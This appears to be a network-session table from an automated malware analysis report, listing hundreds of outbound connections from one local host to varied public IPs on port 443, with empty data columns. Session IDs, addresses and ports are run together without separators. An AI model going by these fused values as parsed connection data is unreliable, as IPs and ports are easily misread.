                                                23715192.168.2.2334720223.82.151.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23716192.168.2.2340182157.155.134.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23717192.168.2.2349018178.42.233.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23718192.168.2.2360722190.52.10.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23719192.168.2.233923690.191.115.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23720192.168.2.2354950179.90.136.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23721192.168.2.233804093.111.163.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23722192.168.2.235191881.165.6.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23723192.168.2.234076870.40.178.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23724192.168.2.234207451.118.24.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23725192.168.2.2353484210.152.45.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23726192.168.2.233799297.245.166.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23727192.168.2.2346906149.68.213.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23728192.168.2.2339550222.140.108.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23729192.168.2.2333246186.19.211.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23730192.168.2.2358408124.105.96.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23731192.168.2.2342340187.79.160.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23732192.168.2.2351472148.12.90.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23733192.168.2.234608484.172.220.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23734192.168.2.235948293.210.234.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23735192.168.2.2355298136.227.68.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23736192.168.2.2360042148.30.82.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23737192.168.2.2358812132.128.88.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23738192.168.2.233647260.79.30.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23739192.168.2.23445008.9.0.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23740192.168.2.2349230219.69.200.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23741192.168.2.2344224164.47.83.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23742192.168.2.2353408189.114.122.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23743192.168.2.2337362218.81.86.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23744192.168.2.235408443.154.161.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23745192.168.2.235830444.205.40.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23746192.168.2.2334696131.142.43.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23747192.168.2.2358686120.229.37.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23748192.168.2.2359692146.25.28.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23749192.168.2.235049846.246.84.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23750192.168.2.234975052.107.200.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23751192.168.2.2356628170.15.53.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23752192.168.2.2352174101.236.32.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23753192.168.2.2352574162.88.173.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23754192.168.2.234502892.141.147.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23755192.168.2.2351414183.46.97.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23756192.168.2.2335526165.109.208.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23757192.168.2.234226668.116.239.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23758192.168.2.2343692195.127.207.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23759192.168.2.234995062.57.184.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23760192.168.2.2341134119.248.142.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23761192.168.2.2344678199.67.249.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23762192.168.2.2359844202.114.214.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23763192.168.2.233322841.230.227.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23764192.168.2.235791465.155.227.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23765192.168.2.2358524107.49.60.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23766192.168.2.2346818171.134.213.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23767192.168.2.2338758186.6.116.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23768192.168.2.2354656126.191.105.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23769192.168.2.236036246.55.158.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23770192.168.2.235378697.165.76.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23771192.168.2.233340075.93.103.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23772192.168.2.23581161.216.47.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23773192.168.2.2358986110.253.4.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23774192.168.2.234428819.232.71.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23775192.168.2.2349444112.236.215.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23776192.168.2.2338122210.81.4.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23777192.168.2.234199038.106.128.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23778192.168.2.2339076149.225.138.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23779192.168.2.2360556141.58.18.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23780192.168.2.235241269.218.163.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23781192.168.2.2334366220.159.131.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23782192.168.2.2338464111.199.134.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23783192.168.2.2343088114.103.27.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23784192.168.2.2336054125.79.42.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23785192.168.2.2355804195.87.96.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23786192.168.2.234443847.187.87.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23787192.168.2.233885654.53.134.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23788192.168.2.234144085.71.53.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23789192.168.2.234603227.153.217.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23790192.168.2.2337634117.204.195.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23791192.168.2.235734840.158.135.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23792192.168.2.234088242.12.234.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23793192.168.2.234626834.43.91.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23794192.168.2.2355058174.88.179.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23795192.168.2.23517208.134.0.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23796192.168.2.2337756108.24.213.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23797192.168.2.2341750210.98.250.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23798192.168.2.2355038217.173.213.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23799192.168.2.234726043.21.142.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23800192.168.2.235273020.183.116.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23801192.168.2.2344154107.34.87.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23802192.168.2.2354496205.235.147.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23803192.168.2.234557871.41.67.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23804192.168.2.2358040151.35.234.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23805192.168.2.2352928194.241.62.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23806192.168.2.2345808148.142.63.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23807192.168.2.234855227.177.89.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23808192.168.2.233567062.7.116.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23809192.168.2.23581829.226.165.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23810192.168.2.2349840151.10.142.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23811192.168.2.2360920132.70.19.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23812192.168.2.2357330120.131.52.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23813192.168.2.233389639.222.111.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23814192.168.2.2352034152.146.188.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23815192.168.2.2355108135.99.149.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23816192.168.2.235323636.209.127.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23817192.168.2.233779220.45.108.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23818192.168.2.2340128146.37.13.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23819192.168.2.235125651.156.55.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23820192.168.2.2354834182.89.51.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23821192.168.2.2348042179.76.37.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23822192.168.2.2352998157.250.78.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23823192.168.2.2353838125.172.237.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23824192.168.2.2350686185.21.185.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23825192.168.2.233404019.77.139.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23826192.168.2.2340300175.1.138.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23827192.168.2.235772647.74.221.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23828192.168.2.2345824156.179.56.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23829192.168.2.2355360143.65.69.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23830192.168.2.2337150139.156.174.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23831192.168.2.2359036118.21.25.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23832192.168.2.235906485.252.159.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23833192.168.2.2360858201.110.248.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23834192.168.2.233752882.117.227.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23835192.168.2.233935669.2.74.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23836192.168.2.2352702124.192.132.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23837192.168.2.235428034.217.213.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23838192.168.2.235212892.44.187.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23839192.168.2.2343194148.86.169.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23840192.168.2.234584491.228.74.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23841192.168.2.2339712167.230.57.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23842192.168.2.2335692168.29.26.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23843192.168.2.235142887.240.233.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23844192.168.2.234376899.228.111.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23845192.168.2.2342558121.242.44.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23846192.168.2.2349814220.68.196.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23847192.168.2.234251237.127.149.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23848192.168.2.2358544177.52.88.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23849192.168.2.233282257.135.220.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23850192.168.2.2347750128.60.120.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23851192.168.2.235346283.135.89.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23852192.168.2.2342472198.160.124.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23853192.168.2.2341320143.67.50.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23854192.168.2.233758425.198.165.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23855192.168.2.2356076122.34.49.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23856192.168.2.2336906151.181.122.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23857192.168.2.2359682164.247.15.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23858192.168.2.2347156197.114.97.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23859192.168.2.233706646.43.95.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23860192.168.2.2346074146.234.43.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23861192.168.2.234178893.136.2.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23862192.168.2.235773469.107.100.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23863192.168.2.2353518111.131.160.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23864192.168.2.234925251.10.192.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23865192.168.2.2347090144.134.35.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23866192.168.2.2353592216.135.162.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23867192.168.2.2339490176.163.204.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23868192.168.2.2342908194.9.248.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23869192.168.2.2338230213.100.55.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23870192.168.2.2342900109.92.13.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23871192.168.2.235553894.182.116.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23872192.168.2.2356406157.189.174.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23873192.168.2.2353640133.243.236.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23874192.168.2.2358916135.124.3.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23875192.168.2.2346840152.161.0.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23876192.168.2.234501892.245.114.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23877192.168.2.2349310109.35.37.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23878192.168.2.2339630146.237.176.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23879192.168.2.23536181.12.89.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23880192.168.2.2352058222.73.105.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23881192.168.2.234503414.188.101.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23882192.168.2.235775851.33.220.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23883192.168.2.2334116113.61.6.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23884192.168.2.235471658.60.43.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23885192.168.2.2334542180.86.69.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23886192.168.2.2346370184.198.227.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23887192.168.2.234521480.83.72.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23888192.168.2.235656476.83.240.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23889192.168.2.234985660.1.218.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23890192.168.2.23557045.48.205.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23891192.168.2.2359760174.206.75.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23892192.168.2.2354344115.120.84.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23893192.168.2.235426031.87.72.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23894192.168.2.235322298.120.75.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23895192.168.2.235326635.166.80.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23896192.168.2.233331898.210.147.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23897192.168.2.2341394178.141.248.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23898192.168.2.234501046.231.247.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23899192.168.2.2359320182.168.219.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23900192.168.2.2353500164.23.14.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23901192.168.2.2352334178.205.41.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23902192.168.2.2350072216.80.97.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23903192.168.2.235876439.121.175.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23904192.168.2.2356924124.107.8.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23905192.168.2.233355848.20.221.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23906192.168.2.2345458188.255.57.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23907192.168.2.2335778140.233.109.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23908192.168.2.2341962213.190.73.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23909192.168.2.235562679.7.101.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23910192.168.2.2344300153.170.205.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23911192.168.2.233697218.181.229.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23912192.168.2.2360100156.52.117.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23913192.168.2.2335810164.168.68.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23914192.168.2.234932864.170.97.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23915192.168.2.235858244.129.137.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23916192.168.2.2357214146.206.126.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23917192.168.2.2352886113.135.87.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23918192.168.2.235631847.161.226.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23919192.168.2.233502275.117.108.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23920192.168.2.233487649.155.245.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23921192.168.2.2350010197.52.194.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23922192.168.2.2339640115.240.219.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23923192.168.2.2342392163.107.220.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23924192.168.2.2358102175.68.191.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23925192.168.2.235407647.2.100.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23926192.168.2.2334300135.193.197.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23927192.168.2.2333146157.222.60.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23928192.168.2.2358666115.93.209.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23929192.168.2.2348310184.168.169.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23930192.168.2.234635820.251.168.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23931192.168.2.2358820113.52.33.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23932192.168.2.2343698141.14.50.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23933192.168.2.235149265.25.224.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23934192.168.2.2352160196.30.200.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23935192.168.2.2339202164.68.45.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23936192.168.2.2342452111.168.116.21443
                                                TimestampBytes transferredDirectionData


